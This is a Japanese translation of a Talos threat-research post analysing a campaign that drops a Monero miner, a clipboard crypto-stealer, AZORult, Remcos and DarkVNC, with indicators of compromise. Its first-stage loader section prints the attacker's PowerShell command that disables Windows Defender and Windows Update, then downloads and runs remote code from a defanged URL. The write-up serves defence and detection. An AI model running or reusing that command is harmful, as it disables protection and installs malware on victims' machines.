ニュースの概要
- ランサムウェア攻撃や大規模な攻撃が頻繁に見出しを飾っていますが、目立たずに金銭的利益を得る攻撃も発生しています。
- 今回は複数の手口を組み合わせた複合的なサイバー犯罪攻撃を取り上げます。しかるべきモニタリング能力を持つ防御チームは、警戒している攻撃ですが、エンドユーザにはまだ知られていません。
- この攻撃では MITRE ATT&CK フレームワークの手口が複数見られます。主な例は T1089(セキュリティツールの無効化)、T1105(リモートファイルのコピー)、T1027(難読化されたファイルまたは情報)T1086(PowerShell)、T1202(間接コマンド実行)、T1055(プロセスインジェクション)、T1064(スクリプト作成)、T1053(スケジュールされたタスク)T1011(他のネットワーク媒体経由の漏洩)などです。
攻撃者は次々と新しい手口を生み出して、金銭的利益をもぎ取ろうとしています。Cisco Talos が最近発見した複雑なキャンペーンでは、複数の実行可能なペイロードを使い分けていました。いずれも資金の獲得が主目的ですが、手口が若干異なります。1 つめのペイロードは XMRigCC を基にした Monero 暗号通貨のマイナー、2 つめはクリップボードを監視してコンテンツを置き換えるトロイの木馬です。また、悪名高い情報搾取型マルウェア AZORult の亜種、リモートアクセスツール Remcos の亜種、バックドア型トロイの木馬 DarkVNC も発見されています。
最新情報
ISO イメージファイルに実行可能ファイルのダウンローダを埋め込んで AZORult を送り込む方法には、やや目新しさがあります。攻撃者が複数の手口を使い分けて資金を獲得する試みも異例です。
仕組み
感染チェーンの心臓部は ISO ディスクイメージファイルを含む ZIP ファイルです。ユーザがこの ISO ファイルを開くと、実行可能ローダを含むディスクイメージがマウントされます。ローダが起動すると悪意のあるコードが難読化されます。難読化された PowerShell ローダステージのダウンロードを皮切りに、感染が全体に広がります。セキュリティツールと Windows update サービスが無効化されると、ペイロードがダウンロードされ、起動されます。
影響
防御側は警戒を怠らず、ネットワーク内のシステムの動作を常に監視する必要があります。攻撃者はまるで水のようです。小さな割れ目が見つかれば流れ込んで、目的を達しようとします。最も貴重な資産の保護が何より重要ですが、インフラストラクチャに照準を当てていない脅威も無視してはなりません。
技術概要
背景
調査のきっかけは、PowerShell プロセスで PowerShell ローダのダウンロードと実行プロセスが開始されたことを示すテレメトリエントリでした。
このテレメトリを分析したところ、ユーザによってオペレーティングシステム内にマウントされた ISO イメージには実行可能ドロッパが含まれていて、そのドロッパが PowerShell ダウンロード用コードを起動していることがわかりました。ISO イメージは ZIP ファイルに圧縮されてダウンロードされたものと見られ、パスワードで暗号化された可能性が高いことから、主にメールが拡散手段として使われたものと推察されます。
サンドボックスを無効にする実行可能ドロッパ
このドロッパの機能は比較的単純ですが、コードには興味深い特徴があります。悪質な API 呼び出しはすべて複雑な変化の中で行われますが、PEB が検出されたあと、メモリ内にロードされたモジュールのアドレスが確認され、モジュールリストの構造が解析されます。次にエクスポートテーブルで必要な機能のアドレスが見つかるまでダウンローダで検索が繰り返されてから、特定されたアドレスが「call reg」指示を使って間接的に呼び出されます。
ダウンローダ PowerShell コードのコマンドライン全体を含め、すべての文字列は静的バイトキーで暗号化されます。キーは文字列ごとに異なり、実行中に同じく暗号化されます。
PowerShell ダウンローダのコマンドラインは、バイト XOR キーを使って難読化処理が解除されます。
特徴の中でも興味深いのが、リストからランダムに API を 2 回呼び出す関数です。最初に 0 ~ 9 から無作為に生成された 2 つの数値が疑似乱数ジェネレータを使って生成されます。これらの数値(m と n)はこの関数のパラメータとして使用されます。
ランダム API コール関数
次に示すとおり、この関数ではまずリストからランダムに API m、n が選ばれ、選ばれた API が順に呼び出されます。
- GetCommandLineA
- GetTickCount
- GetLastError
- GetSystemDefaultLangID
- GetCurrentProcess
- GetProcessHeap
- GetEnvironmentStrings
以上の動きには、一連の API 呼び出しの実行を手掛かりにするなど、挙動でウイルスを検知するプログラム、エミュレータ、サンドボックスを混乱させる意図があると考えられます。
やがてダウンローダによって MessageBox API が呼び出され、偽のエラーメッセージが表示されます。
実行可能ファイルのダウンローダによって表示された偽のエラーメッセージ。
第一段階の PowerShell ローダ
PowerShell ローダの第一段階は以下のとおり単純なコマンドラインです。
Base64 コマンドラインオプションが解読されると、実際のダウンロードコードが判明します。githubusercontent.com を使用するこのコードでは、まず Windows Defender を無効にして Windows Update が停止させられます。次に Invoke-Expression cmdlet を使って次段階のマルウェアがダウンロードされ、実行されます。
Set-MpPreference-DisableRealtimeMonitoring $true cmd /c reg add 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f cmd /c sc stop wuauserv\r\ncmd /c sc config wuauserv start= disabled iex ((New-Object System.Net.WebClient).DownloadString('hxxps://gist[.]githubusercontent[.]com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw/c6f8b4c36e48425507271962855f3e2ac695f99f/baseba'))
ダウンロードされた PowerShell スクリプトはまず Base64 で復号され、cmdlet ConvertTo-SecureString を使って解読されます。最初のコードに Invoke-Obfuscation を適用した結果。最終的には何重にも難読化を繰り返した難読化 PowerShell スクリプトができあがります。難読化を解除すると、PowerShell ローダの機能を確認できます。
PowerShell ローダ
実行可能ダウンローダによって PowerShell スクリプトがダウンロード・実行されると、ペイロードのインストールが可能になるため、ユーザがログアウトした後も常駐するようになります。ペイロードはすべて外部サイトからダウンロードされます。
PowerShell ではまず、警告やエラーメッセージが表示されないようにプリファレンスが設定され、エラーが生じても引き続きスクリプトが実行されるようになります。
$WarningPreference = "SilentlyContinue" $erroractionpreference = "SilentlyContinue"
次に実行ファイルでは現在の権限が確認されます。ユーザが管理者権限を持つ場合、ローダで動作が変更されます。
ユーザが管理者権限を持たない場合、ローダでレジストリ値「HKCU\Software\Kumi」が作成され、XMRigCC 仮想通貨マイナーの亜種をダウンロード・実行するコードを含む文字列が Base64 で符号化されて保存されます。次に「OneDrive Sync Task」という名前の予約タスクが作成され、事前に作成されていたレジストリエントリからマイナーが読み込まれて、1 時間ごとに実行と起動が繰り返されます。
ユーザが管理者グループに所属する場合、ローダでまず Windows Defender 用の除外フォルダが作成され、特定のフォルダがスキャンされないようになります。次に保護機能の多様なユーザ通知が無効化され、攻撃コンポーネントが検知されても通知されなくなります。Malwarebytes のアンチマルウェアサービスがコンピュータにある場合は、停止後に削除されます。
管理者権限を得たローダは、WinDefends、ThunderSec、WindowsNetworkSVC という 3 つのサービスを作成し、これらのサービスを 1 時間ごとに起動する予約タスク 3 件を作成しようとします。タスクにはそれぞれ「\Microsoft\Windows\Shell\updshell」、「\Microsoft\Windows\Autochk\SystemProxy」、「\Microsoft\Windows\MobilePC\DetectPC」という名前が付いています。
執筆時点では、Remcos リモートアクセスツールの亜種または DarkVNC リモートアクセスのトロイの馬の亜種のいずれかのローダが最初の URL で検出されました。ユーザが管理者権限を有する場合、ローダによって Remcos が起動され、そうでない場合は DarkVNC が起動されます。
次にローダは githubusercontent.com から、クリップボードを変更するトロイの木馬をダウンロードして起動します。このファイルは「clp.exe」という名称でユーザの一時フォルダに保存されます。これは仮想通貨を盗むツールで、詳細については後述します。
権限にかかわらず、ローダによってレジストリ値「HKCU\Software\cr\d」が作成されます。上述したバックドア型トロイの木馬のいずれかがダウンロード・起動されたあと、「シェルの更新(Update Shell)」タスクを 5 時間ごとに実行するスケジュールを設定するコードが保存されます。このタスクによって保存された値は Base64 で符号化された文字列としてレジストリに読み込まれ、hxxps://raw[.]githubusercontent[.]com/mysslacc/thd/master/base という URL からコードがダウンロードされます。
最後に、情報を窃取するトロイの木馬「AZORult」の亜種がプロセスインジェクタ「RunPE」を使用して、notepad.exe プロセスにローダによって投入されます。
Cisco Threat Grid に表示される PowerShell ローダのプロセスツリー
ペイロード
XMRIGCC 暗号マイナー
ローダによってインストールされるペイロードのうち、最も凡庸と考えられるのがオープンソースマイナーの亜種「XMRigCC」です。これはコマンド & コントロール(C2)コンソールを通じて制御可能です。XMRigCC には自前のローダがあります。このローダは復号プロセスによって呼び出され、メインローダの変数 $kumi のコンテンツを実行します。
ペイロードの中には C2 サーバに接続されるのでなく、以下の URL リストからプールホストを選択するように設定されているものがあります。すべての接続がポート 443 を経由するのは、他のポートを使った場合よりも検知されにくいからだと考えられます。
分析から特定されたホスト一覧は以下のとおりです。
- eu[.]minerpool[.]pw
- 185[.]10[.]68[.]220
- rig[.]zxcvb[.]pw
- rig[.]myrms[.]pw
- back123[.]brasilia[.]me
- rs[.]fym5gserobhh[.]pw
eu[.]minerpool[.]pw に対する DNS リクエストの急増を示す Cisco Umbrella。
ローダのプロセス権限によってはクリプトマイナー自体がインストールされます。PowerShell ローダに管理者権限がある場合は、インストールされている Windows Defender、Malwarebytes、Sophos、HitManPro が無効化されます。そして IP アドレス 195.123.234.33 からダウンロードされたペイロードが C:\ProgramData\Oracle\Java\java.exe にコピーされます。
特筆すべき点は、OpenLibSys ユーティリティからサードパーティのドライバ「WinSys0」をダウンロードする機能です。これによりクライアント アプリケーションは物理メモリの読み取りと書き込みが可能になります。ドライバの使用された形跡は目立たず、ドライバがメモリにロードされた証拠は残りません。
ローダによって次のスケジュールタスクが作成されます。
- \Microsoft\Windows\Bluetooth\UpdateDeviceTask
- \Microsoft\Windows\Shell\WindowsShellUpdate
- \Microsoft\Windows\Shell\WinShell
- \Microsoft\Windows\UPnP\UPnPHost
- \Microsoft\Windows\UPnP\UPnPClient Task
- \Microsoft\Windows\SMB\SMB Task
- \Microsoft\Windows\EDP\EDP App Lock Task
- \Microsoft\Windows\EDP\EDP App Update Cache
- \Microsoft\Windows\MobilePC\DetectPC
- \Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization
- \Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138
またオペレーティングシステムのビットに応じて、以下の 2 つのサービスのいずれかが作成されます。
- cli_optimization_v2.0.55727_64
- cli_optimization_v2.0.55727_32
上記サービスは同じクリプトマイナー用ローダを取得・実行する HTML アプリケーションをダウンロードするために、mshta.exe の呼び出し専用に使用されます。
ローダでは Windows イベントのログ作成を無効にする PowerShell スクリプト「del.ps1」がダウンロード・実行され、プロセスエクスプローラ、タスクマネージャ、プロセスモニター、Daphne Task Manager などのシステムユーティリティが強制終了されます。
管理権限を持たないクリプトマイナー ローダ ブランチでもよく似たプロセスが行われますが、現在のユーザが変更可能なオブジェクトに加えられた変更が考慮されます。
以下は権限が限定的なローダによって作成されるスケジュールタスクの新しい名前のリストです。
- OneDrive の同期
- OneDrive SyncTask
- Optimization .NET
- スタートメニューのキャッシュファイルの最適化:S-3-5-21-2236678155-433519125-1142214968-1037
- スタートメニューのキャッシュファイルの最適化:S-3-5-21-2236678155-433529325-1142214968-1137
- スタートメニューのキャッシュファイルの最適化:S-3-5-21-2236678155-433529325-1142214968-1138
- スタートメニューのキャッシュファイルの最適化:S-3-5-21-2236678155-433529325-1142214968-1337
- スタートメニューのキャッシュファイルの最適化:S-3-5-21-2236678155-433529325-1142214968-1447
- スタートメニューのキャッシュファイルの最適化:S-3-5-21-2236678155-433529325-1142314968-1037
- \Microsoft\Windows\Optimization
仮想通貨のクリップボード情報の搾取
次のペイロードは仮想通貨のクリップボード情報を搾取するトロイの木馬です。メインローダでは hxxps://gist[.]githubusercontent[.]com/mysslacc/ee6d2b99f8e3a3475b7a36d9e96d1c18/raw/1a82b38931d8421406f53eb8fc4c771127b27ce4/clp からダウンロードされたトロイの木馬が、ユーザの一時フォルダに「clp.exe」として保存されてから起動されます。
このトロイの木馬は、ユーザの ProgramData\updip フォルダにある updip.exe というファイルに自己複製されます。ユーザのスタートアップフォルダにリンクファイル「udpid.lnk」が作成され、ユーザがシステムにログインする度にトロイの木馬が実行されるようになります。このリンクファイルはトロイの木馬によって直接呼び出される PowerShell プロセスによって、Base64 符号スクリプトを含む長いコマンドラインを使って作成されます。
新しいスケジュールタスク「GoogleChromeUpdateTask」の作成を通じてトロイの木馬は 3 時間ごとに実行されるため永続性も確保されます。
インストールと永続性のほかに、このトロイの木馬には 0.5 秒ごとにクリップボードのコンテンツを監視する主要機能が単純なループに含まれています。クリップボードのコンテンツとの照合には正規表現の難読化リストが使用されます。文字列はデータバッファまたは連続したメモリの場所に割り当てられる定数として保存されます。バッファが作成されると、コンテンツはバイトキー 0x2e を持つ XORd となります。
正規表現の難読化を解除してビットコインのアドレスを照合。
この例では、トロイの木馬が値「70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53」を使ってメモリバッファを初期化しているのが示されています。XOR の後には正規表現「#^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$」が続いており、ビットコインのアドレスとの照合に使用されたことが明白です。ビットコインのアドレスが一致しない場合、マルウェアではおそらくトランザクションを攻撃者の所有アドレスにリダイレクトするために、クリップロードの変更ルーチンが呼び出されます。
攻撃者のビットコインウォレットのアドレスを解読しクリップボードのデータを置換。
関数の引数に基づき、このトロイの木馬では攻撃者が所有する仮想通貨アドレスの 1 つが選択され、難読化が解除されたデータを含むようにクリップボードが変更されます。この例でもバッファが値「1d6d5d4a17745f1a5c1f184a787f5b7c6b5d1b1c571b4b646849776b5f7f446f561f」で満たされていることが見て取れます。この値は難読化解除後にアドレス「3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1」になります。その後、このアドレスによって約 5.9 枚のビットコインが取得されたことが一目でわかります。
トランザクション数とクリップボード情報窃取ツールによって奪われたビットコインの枚数。
トロイの木馬は、以下の正規表現を使って、ビットコイン、ライトコイン、イーサリアム、ダッシュ、モネロ、ドージコインを標的とします。
^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ - ビットコイン ^0x[a-fA-F0-9]{40}$ ^[LM][A-z][1-9A.z]{32}$ ^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$ ドージコイン ^DX[a-z][1-9A-z]{32}$ - Dash:誤った正規表現 ^[0-9][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}$ - Monero
次の 3 つのペイロードの配信手法では、難読化されたバイナリローダとバイト配列をテキスト形式でダウンロードして実際のバイナリに転換するために PowerShell を使用しています。ダウンロードは VisualBasic アセンブリを読み込むリフレクション機能を使って実行されます。ペイロードは VisualBasic 通信インターフェイスを通じて PowerShell と交信します。スクリプトによってまずバイナリローダ RunPE が解凍され、読み込まれます。このローダを使用してバイナリペイロードを含むバイト型配列が新規作成プロセスのプロセス空間(Remcos 用に explorer.exe、DarkVNC 用に control.exe、AZORult 用に notepad.exe)に読み込まれます。ペイロードの内容は共通しているためここでは簡単な説明にとどめ、詳細分析は割愛します。
DarkVNC ペイロードをバイト型配列から読み込む RunPE のダウンロードと読み込み
AZORult
AZORult は、Delphi で記述された、JSON 設定ファイル形式の情報窃取型ボットであり、いわゆる「作業」のために C2 サーバに接続します。C2 サーバとの通信には HTTP を使用します。ペイロードはデフォルトの XOR キー、0x0d, 0x0a, 0xc8 で暗号化されます。
ボットはインストール後に、POST リクエストを使ってサーバと交信します。ボットのバージョンによっては、サーバから JSON 設定ファイルまたは一連の DLL を送信して、情報窃取に利用します。また、窃取対象コンテンツの洗い出しに使用される一連の新規文字列も送信します。
AZORult は以下の行為を試す可能性があります。
- ブラウザに保存されているパスワードの窃取
- 仮想通貨ウォレットの窃取
- ブラウザ履歴情報の窃取
- Web サイトの Cookie の窃取
- 電子メールへのログイン情報の窃取
- Telegram のログイン情報の窃取
- Steam のログイン情報の窃取
- Skype のログイン情報とメッセージ履歴情報の窃取
- 侵入先のマシンのスクリーンショットの取得
- カスタムコマンドの実行
Remcos
Remcos は Breaking Security 社が販売するリモートアクセス型トロイの木馬(RAT)です。同社はこの記事に対する返答で、Remcos の販売は合法的用途に限られ、利用規約に従わないユーザのライセンスは取り消されると主張しています。しかし攻撃者が購入した場合、違法なボットネットの確立と実行に必要な要素はすべてそろいます。
Remcos には典型的な RAT の機能一式が備わっています。システムに潜入し、マルウェアの手法を駆使して一般ユーザからは気づかれにくいよう環境をつくり変える能力があります。C++ 言語で記述され、充実した機能の割にはコンパクトなソフトウェアです。
PowerShell ローダに含まれる Remcos ペイロードの最新版は 2.5.0 です。Talos は Remcos 設定ファイルを簡単に抽出できる復号化ツールを作成しました。Cisco Umbrella には、最初の PowerShell ローダを発見した頃のサンプルであるデフォルトの C2 ドメイン「dfgdgertdvdf.xyz」に対するリクエストの増加が示されています。
Remcos ペイロードのデフォルト C2 ドメインに対する DNS アクティビティ。
DarkVNC
DarkVNC 型トロイの木馬の亜種は、管理者権限を持たないユーザを攻撃の対象とし、VNC プロトコルを使って感染したシステムへのリモートアクセスを可能にします。C2 サーバの IP アドレス(このサンプルでは 52.15.61.57)が Remcos サンプル設定(dfgdgertdvdf.online)で特定される C2 ドメインの 1 つと共有されます。
この IP アドレスは確認されているだけでも 2019 年 12 月中旬以降、複数のキャンペーンで頻繁に使用されています。
実際に、このドメインに対する DNS 活動がデフォルトの Remcos C2 の活動と一致しているのが読み取れます。DarkVNC は TCP ポート 8080 を使用して C2 サーバとの接続を試みます。このポートは HTTP プロキシに接続するデフォルトポートの 1 つであるため、疑われる可能性が小さいと言えます。
DarkVNC ペイロードのデフォルト C2 ドメインに対する DNS アクティビティ。
DarkVNC では 新規プロセス「svchost.exe」が起動され、オペレーティングシステムのビットに応じて 32 ビットまたは 64 ビットバージョンの DLL が svchost.exe プロセス空間に投入されます。ドロッパから抽出されるロード済みライブラリにはリモートアクセス機能が備わっています。
まとめ
この記事では、技術レベルは低 ~ 中程度ながら、金銭を詐取する方法を熟知している攻撃者の手口について説明しました。攻撃では、仮想通貨マイナー、悪名高い情報窃取ソフトウェア AZORult、リモートアクセスツールの Remcos と DarkVNC、クリップボード情報を変更するトロイの馬など、幅広いペイロードを複数組み合わせています。
AZORult、Remcos の攻撃で使用されるローダとペイロード。
特別な時期であっても、普段どおりサイバー犯罪者は付け入る隙を狙っています。ユーザが新型コロナウイルスの大流行に不安を募らせ、在宅勤務への移行を進める中、こうした状況を隠れ蓑に攻撃を続けることが予想されます。
カバレッジ
お客様がこの脅威を検出してブロックするための方法を以下に記載します。
Advanced Malware Protection(AMP)は、これらの攻撃者がマルウェアを実行できないようにするための最適な方法です。AMP 内に存在するエクスプロイト防止機能は、このような未知の攻撃からお客様を自動的に保護するように設計されています。
Cisco クラウド Web セキュリティ(CWS)または Web セキュリティアプライアンス(WSA)の Web スキャンは、悪意のある Web サイトへのアクセスを防止し、上述したような攻撃で使用されるマルウェアを検出します。
E メールセキュリティは、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。
次世代ファイアウォール(NGFW)、次世代侵入防御システム(NGIPS)、Cisco ISR、Meraki MX などのネットワーク セキュリティ アプライアンスは、今回の脅威に関連する不正アクティビティを検出します。
AMP Threat Grid は、悪意のあるバイナリを特定し、すべてのシスコセキュリティ製品に保護機能を組み込みます。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。
オープンソースの Snort サブスクライバルールセットをお使いであれば、Snort.org で購入可能な最新のルールパックをダウンロード
すると、最新状態を維持できます。
IOC(侵入の痕跡)
SHA256
PE ペイロード
bf2f3f1db2724b10e4a561dec10f423d99700fec61acf0adcbb70e23e4908535 – Remcos ペイロード
42525551155fd6f242a62e3202fa3ce8f514a0f9dbe93dff68dcd46c99eaab06 – AZORult ペイロード
2014c4ca543f1cc946f3b72e8b953f6e99fbd3660edb4b66e2658b8428c0866d – 64 ビット XMRig
bde46cf05034ef3ef392fd36023dff8f1081cfca6f427f6c4894777c090dad81 – DarkVNC メイン
1c08cf3dcf465a4a90850cd256d29d681c7f618ff7ec94d1d43529ee679f62f3 – DarkVNC 64 ビット DLL
a02d761cbc0304d1487386f5662a675df3cc6c3ed199e8ed36f738e9843ccc1b – AZORult, Remcos, DarkVNC 向け RunPE ローダ
2f1668cce3c8778850e2528496a0cc473edc3f060a1a79b2fe6a9404a5689eea – 情報窃取ツール(アンパック)
9e3a6584c77b67e03965f2ae242009a4c69607ea7b472bec2cba9e6ba9e41352 – 32 ビット XMRigCC
29695ca6f5a79a99e5d1159de7c4eb572eb7b442148c98c9b24bdfdbeb89ffc0 – 32 DarkVNC dll
aca587dc233dd67f5f265bfda00aec2d4196fde236edfe52ad2e0969932564ed – 仮想通貨クリップボード情報窃取ツール
ドロッパ
598c61da8e0932b910ce686a4ab2fae83fa3f1b2a4292accad33ca91aa9bd256 – 実行可能ファイルメインローダ
d88ed1679d3741af98e5d2a868e2dcb1fa6fbd7b56b2d479cfa8a33d8c4d8e0b – ZIP ファイルで配信される ISO イメージ
XMRigCC と接続される HTML アプリ
936fbe1503e8e0bdc44e4243c6b498620bb3fefdcbd8b2ee85316df3312c4114
57f1b71064d8a0dfa677f034914e70ee21e495eaab37323a066fd64c6770ab6c
f46a1556004f1da4943fb671e850584448a9521b86ba95c7e6a1564881c48349
b7c545ced7d42410c3865faee3a47617f8e1b77a2365fc35cd2661e571acdc06
PowerShell スクリプト
2548072a77742e2d5b5ee1d6e9e1ff9d67e02e4c96350e05a68e31213193b35a
14e956f0d9a91c916cf4ea8d1d581b812c54ac95709a49e2368bd22e1f0a32ca – XMRigCC ローダ
cea286c1b346be680abbbabd35273a719d59d5ff8d09a6ef92ecf75689b356c4 – 難読化解除 PowerShell ダウンローダ
35b95496b243541d5ad3667f4aabe2ed00066ba8b69b82f10dd1186872ce4be2 – クリーンアップスクリプト
ef9fc8a7be0075eb9372a2564273b6c1fffdb4b64f261b90fefea1d65f79b34e – XMRigCC の一部をサポート
3dd5fbf31c8489ab02cf3c06a16bca7d4f3e6bbc7c8b30514b5c82b0b7970409 – PowerShell メインローダ亜種
q5fdc4103c9c73f37b65ac3baa3cceae273899f4e319ded826178a9345f6f4a00 – PowerShell メインローダ亜種
URL
hxxp://195[.]123[.]234[.]33/win/checking[.]hta
hxxp://195[.]123[.]234[.]33/win/checking[.]ps1
hxxp://195[.]123[.]234[.]33/win/del[.]ps1
hxxp://195[.]123[.]234[.]33/win/update[.]hta
hxxp://answerstedhctbek[.]onion
hxxp://asq[.]r77vh0[.]pw/win/checking[.]hta
hxxp://jthnx5wyvjvzsxtu[.]onion[.]pet
hxxp://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta
hxxps://answerstedhctbek[.]onion
hxxps://answerstedhctbek[.]onion[.]pet
hxxps://asq[.]d6shiiwz[.]pw/win/checking[.]ps1
hxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta
hxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1
hxxps://asq[.]r77vh0[.]pw/win/hssl/r7[.]hta
hxxps://darkfailllnkf4vf[.]onion[.]pet
hxxps://dreadditevelidot[.]onion[.]pet
hxxps://fh[.]fhcwk4q[.]xyz/win/checking[.]ps1
hxxps://fh[.]fhcwk4q[.]xyz/win/hssl/fh[.]hta
hxxps://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta
hxxps://runionv62ul3roit[.]onion[.]pet
hxxps://rutorc6mqdinc4cz[.]onion[.]pet
hxxps://thehub7xbw4dc5r2[.]onion[.]pet
hxxps://torgatedga35slsu[.]onion
hxxps://torgatedga35slsu[.]onion[.]pet
hxxps://torrentzwealmisr[.]onion[.]pet
hxxps://uj3wazyk5u4hnvtk[.]onion[.]pet
hxxps://vkphotofqgmmu63j[.]onion[.]pet
hxxps://xmh57jrzrnw6insl[.]onion[.]pet
hxxps://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad[.]onion[.]pet
hxxps://zzz[.]onion[.]pet
hxxp://memedarka[.]xyz/ynvs2/index.php
ドメイン
dfgdgertdvdf[.]online – DarkVNC と Remcos C2
dfgdgertdvdf[.]xyz – Remcos C2
memedarka [.]xyz-AZORult C2
仮想通貨のウォレット
855vLkzTFwr82TrfPKLH6w3UB19RGdHDsGY1etmdyZjZChbhyghtiK66ZVXoVayJXVNydca7KZqE53Dn2Hsk8WdKDmjq3bu – モネロ
XrchZULVyJPAFro13627cyKdfb6ojerRwv – ダッシュ
3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 – ビットコイン
0x51664e573049ab1ddbc2dc34f5b4fc290151cdb4 – イーサリアム
LS2GBEJEzgDy14hVHFp4JJzjKoiMgkbZAY -ライトコイン
D6yFAuCDoMkCftyXTWY8m267PzxeoaiMX7 – ドッジイン
本稿は 2020年4月2日に Talos Group のブログに投稿された「AZORult brings friends to the party」の抄訳です。